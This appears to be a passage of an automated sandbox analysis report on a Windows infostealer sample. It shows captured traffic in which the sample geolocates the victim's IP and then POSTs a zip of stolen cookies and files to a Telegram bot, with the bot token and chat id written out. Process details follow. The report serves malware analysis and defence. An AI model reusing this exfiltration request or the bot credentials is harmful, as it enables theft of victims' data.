                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                Jul 29, 2024 07:32:44.412189960 CEST950INHTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549713149.154.167.2204431996C:\Users\user\Desktop\765iYbgWn9.exe
                                TimestampBytes transferredDirectionData
                                2024-07-29 05:32:55 UTC1236OUTPOST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Co [TRUNCATED]
                                content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1
                                content-length: 891245
                                accept: */*
                                host: api.telegram.org
                                2024-07-29 05:32:55 UTC15148OUTData Raw: 2d 2d 61 38 32 33 30 30 36 61 31 32 64 34 63 33 37 30 2d 36 31 33 34 35 35 35 30 62 33 38 62 32 30 38 62 2d 38 65 35 37 35 31 34 66 34 64 37 65 34 62 63 30 2d 34 64 35 38 34 38 65 64 30 39 65 31 63 39 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 33 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 22 3b fd 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 22 3b fd 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00
                                Data Ascii: --a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"Content-Type: application/zipPK";XAutofill/PK";X
                                2024-07-29 05:32:55 UTC16384OUTData Raw: d3 5a a3 94 c2 38 8e 48 62 b1 58 60 9b 71 1c 89 08 24 61 9b cc c4 36 11 41 44 90 99 4c d3 44 8d 40 12 00 92 00 b0 0d 80 6d 6c 13 11 d4 5a 19 c7 11 80 ae eb 98 a6 89 cc 24 54 91 44 44 00 d0 5a a3 b5 06 40 29 85 5a 2b d3 34 61 1b 49 d8 a6 b5 06 40 29 05 49 dc 4f 12 00 99 09 80 24 6a ad 64 26 99 49 66 72 3f 49 00 d8 26 22 90 84 6d 6c 03 20 09 49 d8 26 33 09 89 88 20 33 19 c7 11 49 74 5d 47 66 22 89 d6 1a 11 81 6d 5a 6b d4 5a 91 84 6d 5a 6b 64 26 a5 14 4a 29 00 d8 06 40 86 cc c4 36 00 11 81 24 32 93 cc a4 d6 ca fd 6c 93 99 00 44 04 92 98 a6 89 88 20 22 90 04 80 6d 00 24 61 9b d6 1a b6 89 08 22 82 07 1a 86 81 ae eb 98 a6 09 67 52 bb 8e cc 24 33 99 cd 66 8c e3 c8 fd 24 21 09 00 db 64 26 b3 da 91 99 d8 c6 36 11 c1 fd 6c 63 1b 49 48 22 22 00 b0 4d 6b 8d cc a4 eb
                                Data Ascii: Z8HbX`q$a6ADLD@mlZ$TDDZ@)Z+4aI@)IO$jd&Ifr?I&"ml I&3 3It]Gf"mZkZmZkd&J)@6$2lD "m$a"gR$3f$!d&6lcIH""Mk
                                2024-07-29 05:32:55 UTC16384OUTData Raw: 6d 5e 18 f1 ef 63 9b 17 2e f9 b7 90 04 80 26 fe 43 d8 e6 45 61 9b 7f 0d f1 c2 d9 e6 df 43 69 fe 5d d2 fc 47 b0 8d 6d 00 24 f1 af 15 e6 59 6c f3 dc c4 bf 8d 6d 5e 18 99 67 b1 cd bf c4 36 2f 8a 30 2f 12 f1 c2 d9 06 40 12 f7 b3 0d 80 6d 24 01 60 9b 07 b2 0d 40 41 bc 30 32 cf c3 36 2f 88 6d 9e 1f 49 3c 90 6d 2e 4b f3 fc d8 06 c0 36 11 01 80 6d 6c 23 09 00 db 48 e2 85 09 9e 93 6d 1e 48 12 cf cd 36 f7 93 79 a1 24 61 1b db d8 e6 b9 95 52 50 9a cc c4 36 00 92 90 84 24 5a 6b 48 e2 b9 49 e2 32 1b 00 49 d8 06 c0 36 b6 b1 4d 20 00 6c 63 9b 88 a0 94 82 6d 5a 6b dc cf 36 00 92 00 90 84 24 32 93 07 92 04 80 6d 00 32 93 52 0a 00 ad 35 00 4a 29 00 b4 d6 28 08 49 00 64 26 00 11 81 24 6c 93 99 b4 d6 e8 ba 8e 52 0a eb f5 1a db f4 7d 0f 40 66 62 9b fb 49 e2 81 64 90 8d 6d 00
                                Data Ascii: m^c.&CEaCi]Gm$Ylm^g6/0/@m$`@A026/mI<m.K6ml#HmH6y$aRP6$ZkHI2I6M lcmZk6$2m2R5J)(Id&$lR}@fbIdm
                                2024-07-29 05:32:55 UTC16384OUTData Raw: 33 c9 4c 6c 53 4a a1 b5 46 6b 8d ae eb 68 ad 51 14 dc cf 36 cf 4d 12 d3 34 01 50 4a 41 12 ad 35 24 11 11 4c d3 04 80 24 24 21 89 07 9a a6 09 49 48 42 12 00 92 90 84 24 32 93 07 b2 cd fd 24 61 9b fb d9 c6 36 00 b6 71 26 42 48 02 40 12 92 90 84 24 24 91 99 64 26 00 92 90 84 6d 00 24 71 3f db 48 42 12 92 00 b0 4d 6b 0d db 48 22 22 00 b0 0d 80 24 6c 93 99 00 48 02 c0 36 92 90 84 27 23 89 fb 49 42 12 b6 b1 8d c2 74 5d 47 66 32 8e 23 11 41 44 70 3f db b4 d6 00 28 a5 20 89 d6 1a b6 89 08 e4 20 22 b0 4d 66 02 10 11 44 04 00 99 49 66 62 1b 49 3c 90 24 54 be 6f 6d db 3c 37 0b 24 61 1b 00 03 48 dc 4f 12 00 b6 79 41 1e 52 f6 78 2d dd c6 2b 96 7b 38 c3 11 b6 59 6c 6c b2 b9 b5 c5 d6 d6 16 11 85 17 64 18 47 2e 5c bc c4 fe e1 21 2f 48 b6 c6 c1 fe 25 0e f7 f6 38 d8 bf c4
                                Data Ascii: 3LlSJFkhQ6M4PJA5$L$$!IHB$2$a6q&BH@$$d&m$q?HBMkH""$lH6'#IBt]Gf2#ADp?( "MfDIfbI<$Tom<7$aHOyARx-+{8YlldG.\!/H%8
                                2024-07-29 05:32:55 UTC16384OUTData Raw: 7e 97 5f fc 89 57 e6 49 6f fe 16 7c f4 df 03 bc 25 bf 78 eb 07 f0 a4 77 fb 70 3e 66 f5 92 f0 a0 97 82 d3 0f 86 a3 4b 00 b0 71 8c e7 70 74 89 e7 b0 71 0c 36 8e f3 2c 47 bb 70 74 89 e7 f1 8c bf c1 cf d8 e4 17 7f f7 4d 78 d2 db bf 27 1f 7d f0 92 f0 a0 97 82 5b 5e 12 8e 2e 71 d9 c6 31 d8 38 8e 36 8f c3 6d 7f 8b 1f 7f 81 5f fc 89 57 e6 49 6f fe 56 7c f4 df 1b 78 4b 7e f1 d6 0f e2 49 6f ff ae 7c f4 7d 0f 42 67 1e 04 1b c7 61 e3 38 6c 1e 83 8d e3 00 08 60 f3 38 6c 1c 87 8d 63 78 b1 c3 0b 75 ee 36 3c 4d 3c f9 e3 cd 97 bd d6 97 f0 ad 1b c7 e1 cc 83 00 e0 68 c6 57 7f f5 db c3 47 bf 23 1f bd 7a 1f 9e fc f3 8f e0 cb 5e eb 5b f9 d6 33 0f 02 5e 92 5f fc f1 47 f2 d3 af fd 95 7c db e6 71 04 e8 f0 31 fc dc 6f bf 31 4f 7a f3 b7 e6 63 fe de f8 c5 3f 9a 27 ff fc 63 f8 b2 d7
                                Data Ascii: ~_WIo|%xwp>fKqptq6,GptMx'}[^.q186m_WIoV|xK~Io|}Bga8l`8lcxu6<M<hWG#z^[3^_G|q1o1Ozc?'c
                                2024-07-29 05:32:55 UTC16384OUTData Raw: 4d 44 60 9b cc a4 eb 3a a6 69 42 12 b5 56 32 93 69 9a 88 08 fa be 67 58 af 91 44 44 10 11 64 26 d3 34 21 89 5a 2b d3 34 11 11 44 04 00 b6 01 c8 4c 32 13 49 dc 4f 12 92 b8 9f 6d 32 13 49 48 02 c0 36 b6 91 04 80 24 5a 6b d8 46 12 92 00 88 08 24 11 08 db d8 26 33 b1 0d 40 44 20 89 cc 04 40 12 00 b6 b1 0d 80 6d 4a 29 d8 06 c0 36 92 00 b0 8d 6d 4a 29 3c 90 6d ee 27 09 49 d8 26 33 01 90 04 80 24 00 0a c2 36 b6 b1 8d 24 00 24 61 9b da 05 d3 34 01 10 11 d8 66 9a 26 00 6a ad 64 26 00 b6 01 90 44 44 60 1b db 48 df b7 32 ff 99 8e 2e c1 d1 25 38 da 85 a3 4b b0 71 0c 36 8e c3 c6 31 d8 38 06 24 ff 9f d9 e6 7e 92 f8 d7 0b 5e 28 07 0f 64 01 36 cf 12 c1 03 15 99 07 92 c4 15 c9 f3 93 99 d8 0d db 60 83 cd 65 36 97 45 00 20 f3 2c b6 79 b6 e0 df c5 e6 df 43 e6 7f 1c db bc a8
                                Data Ascii: MD`:iBV2igXDDd&4!Z+4DL2IOm2IH6$ZkF$&3@D @mJ)6mJ)<m'I&3$6$$a4f&jd&DD`H2.%8Kq618$~^(d6`e6E ,yC
                                2024-07-29 05:32:55 UTC16384OUTData Raw: f7 93 04 80 6d ee 27 09 db d8 46 12 00 b6 b1 cd 15 c9 fd 24 f1 fc b4 69 22 4a 41 12 6d 9a 50 04 a5 14 5a 6b 54 84 6d 6c 23 89 88 40 12 b6 b1 8d 6d 00 24 61 1b db 00 44 04 92 68 ad 61 9b e7 26 09 00 49 d8 06 20 22 b0 4d 66 72 3f 49 00 04 02 c0 36 b6 c9 4c 6c 13 11 48 a2 20 ee 97 99 d8 c6 36 a5 14 6c 63 1b db 00 44 04 f7 8b 08 6c 63 1b 80 88 c0 36 99 49 66 52 6b a5 b5 86 6d 4a 29 00 64 26 b6 89 08 64 9e 83 24 00 6c d3 5a a3 d6 8a 6d 6c 23 09 80 cc 24 00 49 48 02 c0 36 99 89 6d 24 11 11 48 42 06 db 00 d8 c6 36 f7 b3 4d df f7 d8 26 33 b1 8d 6d 24 71 bf 88 8a 6d 6c 63 1b db 48 e2 b9 d9 06 40 12 00 b6 01 08 04 80 24 00 6c 93 99 48 22 22 98 a6 09 00 49 48 e2 7e b6 b1 4d 44 00 60 9b cc c4 36 00 a5 14 4a 29 e4 38 21 09 49 dc cf 36 00 92 00 b0 8d 6d ee 27 09 db 00
                                Data Ascii: m'F$i"JAmPZkTml#@m$aDha&I "Mfr?I6LlH 6lcDlc6IfRkmJ)d&d$lZml#$IH6m$HB6M&3m$qmlcH@$lH""IH~MD`6J)8!I6m'
                                2024-07-29 05:32:55 UTC16384OUTData Raw: 11 47 9e f3 9f 41 e6 85 b2 cd 7f 84 4f 7e dc 67 f1 39 9f f7 85 fc 67 f8 ac cf f8 54 3e e7 f3 be 90 9f fa c9 1f e7 af ff ea 2f f9 85 1b de 86 bf 3d f6 32 bc 48 c4 0b 90 3c a7 e4 f9 91 83 e7 c7 bc 00 e2 39 19 c4 b3 99 fb 05 92 b0 cd 15 01 80 24 ee 27 09 24 ee 27 09 00 49 84 c4 fd 6c 63 1b db d8 c6 36 b6 21 1b 72 43 06 db 00 d8 e6 32 1b 00 45 00 60 9b 07 92 04 80 6d fe 3d 82 7f a7 34 ff 93 d9 e6 3f 82 cc f3 65 9b ff 4c b6 79 61 c2 fc a7 b2 cd bf 4f f0 42 a5 79 61 6c 23 89 e0 d9 6c 23 09 00 db bc 30 b6 f9 cf 24 f3 42 d9 e6 85 91 83 17 c6 36 2f 5c f2 c2 d8 e6 85 09 07 cf cd 36 f7 93 f9 0f 65 9b 07 0a fe 7d 6c f3 ef 21 f3 42 d9 06 40 12 0f 64 1b 00 99 7f 13 db 00 58 5c 26 f3 42 05 2f 98 6d 5e 10 db 00 c8 3c 8b 6d ee 27 89 17 c4 36 ff 59 6c 03 10 cd 3c 90 24 1e
                                Data Ascii: GAO~g9gT>/=2H<9$'$'Ilc6!rC2E`m=4?eLyaOByal#l#0$B6/\6e}l!B@dX\&B/m^<m'6Yl<$
                                2024-07-29 05:32:55 UTC16384OUTData Raw: a8 9b fe 1e c5 0c 9c 40 82 0d 4e 20 c1 c9 8f 3c f9 4e 3e f8 d7 7e 0f 80 17 bf ee 61 fc e6 07 7e 23 0f b4 bb 7b 91 7f f8 eb df e6 95 5f e3 2d b9 df ee ee 2e 5b 5b 5b 48 42 12 00 f5 4d 5f 93 fc e5 df 07 e0 0f ee d8 e7 0d fe 78 8b ff 6e 32 cf 63 e7 49 6f c6 0b 72 cb f1 eb f8 9b 8f fb 41 00 fe e0 d6 bf e1 f7 9f fe d7 7c d2 eb bc 17 00 ef fe 83 9f c9 2f 3c fe f7 79 41 ee fb cc 5f e1 df e3 b3 3e e3 53 f9 e2 17 fb 2c fe 35 6c f3 42 39 f8 ef 24 fe 7d c2 fc 87 4b 71 99 24 32 93 e7 4b 02 20 28 00 d8 c6 36 88 e7 a0 08 00 2c 90 84 24 24 01 20 89 50 05 c0 34 6c 43 1a db d8 0d db b8 35 2e cb 06 36 d8 5c 26 83 21 a8 fc 7b d8 e6 bf 9a 6d ee 27 f3 ef 22 f3 1c 6c f3 af 13 bc 30 b6 f9 0f 67 73 3f 99 ff 10 92 b0 8d 6d 1e 48 e6 df c5 36 2f 4c f0 af 67 9b 7f 89 cc 73 b0 cd 7f
                                Data Ascii: @N <N>~a~#{_-.[[[HBM_xn2cIorA|/<yA_>S,5lB9$}Kq$2K (6,$$ P4lC5.6\&!{m'"l0gs?mH6/Lgs
                                2024-07-29 05:32:55 UTC16384OUTData Raw: fc 49 c2 36 cf cd 36 2f 8a 30 97 d9 e6 39 a4 01 90 c4 fd 6c 73 bf 00 6c e3 30 00 b6 79 20 db 00 48 02 20 cc 65 92 00 b0 8d 6d 20 00 90 c4 fd 6c 73 3f 49 3c 37 db 3c 4b 9a fb d9 e6 7e 32 d8 a6 d6 8a 6d 00 6c a3 34 0f d4 30 b6 01 90 44 41 dc cf 36 b6 01 90 04 80 78 4e b6 01 b0 0d 80 24 00 24 21 89 d6 1a f7 93 c4 bf c4 36 0f 64 9b cc 24 22 88 08 00 5a 6b 48 a2 94 82 87 09 00 49 00 d8 46 12 92 00 b0 4d 66 62 1b 49 00 d8 46 12 11 c1 fd 6c 63 9b fb 49 42 12 99 c9 fd 6c 73 3f 49 48 02 1b a5 b9 5f 66 62 9b 88 20 22 c8 4c ee 27 09 db d8 06 c0 36 92 88 08 24 61 1b db d8 e6 7e 45 60 1b db dc 4f 12 92 b8 22 c8 4c 6c 03 20 09 49 d8 c6 36 5d d7 91 99 d8 46 12 00 99 89 6d 24 51 64 32 13 db 3c 90 6d 6c 13 11 48 02 40 12 00 b6 b1 0d 80 1c 44 04 99 49 66 52 6b 05 a0 b5 06
                                Data Ascii: I66/09lsl0y H em ls?I<7<K~2ml40DA6xN$$!6d$"ZkHIFMfbIFlcIBls?IH_fb "L'6$a~E`O"Ll I6]Fm$Qd2<mlH@DIfRk
                                2024-07-29 05:32:56 UTC389INHTTP/1.1 200 OK
                                Server: nginx/1.18.0
                                Date: Mon, 29 Jul 2024 05:32:56 GMT
                                Content-Type: application/json
                                Content-Length: 1267
                                Connection: close
                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:32:06
                                Start date:29/07/2024
                                Path:C:\Users\user\Desktop\765iYbgWn9.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\765iYbgWn9.exe"
                                Imagebase:0x7ff6a5820000
                                File size:5'438'976 bytes
                                MD5 hash:0534AB10184891CD61D262BFD79B7B4C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:01:32:43
                                Start date:29/07/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:01:32:43
                                Start date:29/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                No disassembly